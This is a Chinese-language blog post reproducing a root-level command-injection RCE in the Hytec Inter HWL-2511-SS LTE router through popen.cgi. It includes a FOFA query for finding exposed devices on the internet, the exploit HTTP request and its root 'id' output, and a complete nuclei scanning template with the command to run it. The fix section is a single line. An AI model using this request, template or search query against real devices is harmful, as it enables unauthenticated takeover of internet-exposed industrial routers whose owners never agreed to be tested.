日本Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞复现(nuclei poc)

admin 2023年11月29日14:22:36评论154 views字数 1528阅读5分5秒阅读模式


使



01

漏洞名称



Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞


02


漏洞影响


Hytec Inter HWL-2511-SS 小于等于v1.05版本


日本Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞复现(nuclei poc)


03


漏洞描述


HWL-2511-SS 是 Hytec Inter 公司的一款工业级 LTE 路由器,可用于远程数据传输,例如收集传感器数据和检查监控摄像头图像。1.05版本及以下的所有 Hytec Inter HWL-2511-SS 设备存在命令注入漏洞,未经身份验证的攻击者可利用该漏洞进行命令注入漏洞攻击,成功利用该漏洞允许攻击者以 root 权限在底层操作系统上执行任意命令。


04


FOFA搜索语句
body="app/feature/portForwarding.js" || body="app/app.translate-config.js"

日本Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞复现(nuclei poc)


05


漏洞复现


向靶场发送如下数据包(get请求可以直接用浏览器访问)

GET /cgi-bin/popen.cgi?command=id HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeAccept: */*Accept-Language: enAccept-Encoding: gzip

响应内容如下

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedCache-Control: no-cacheContent-Type: text/htmlDate: Mon, 27 Nov 2023 06:13:19 GMTExpires: -9999Server: lighttpd/1.4.30Vary: *
uid=0(root) gid=0(root)

漏洞复现成功


06


nuclei poc


poc文件内容如下

id: HWL-2511-SS-popen-rceinfo:  name: Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞  author: fgz  severity: critical  description: Hytec Inter HWL-2511-SS 小于等于v1.05版本/cgi-bin/popen.cgi接口处存在RCE漏洞,未经授权的攻击者可以远程执行任意命令,会导致主机失陷。  metadata:    max-request: 3    verified: true    fofa-query: body="app/feature/portForwarding.js" || body="app/app.translate-config.js"
http: - method: GET path: - "{{BaseURL}}/cgi-bin/popen.cgi?command=id" matchers: - type: dsl dsl: - "status_code == 200 && contains(body,'uid') && contains(body,'gid')"

运行POC

nuclei.exe -t mypoc/其他/HWL-2511-SS-popen-rce.yaml -u http://x.x.x.x

日本Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞复现(nuclei poc)




07


修复建议


升级到最新版本。



原文始发于微信公众号(AI与网安):日本Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞复现(nuclei poc)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年11月29日14:22:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   日本Hytec Inter HWL-2511-SS 路由器 popen.cgi RCE漏洞复现(nuclei poc)https://cn-sec.com/archives/2251252.html

发表评论

匿名网友 填写信息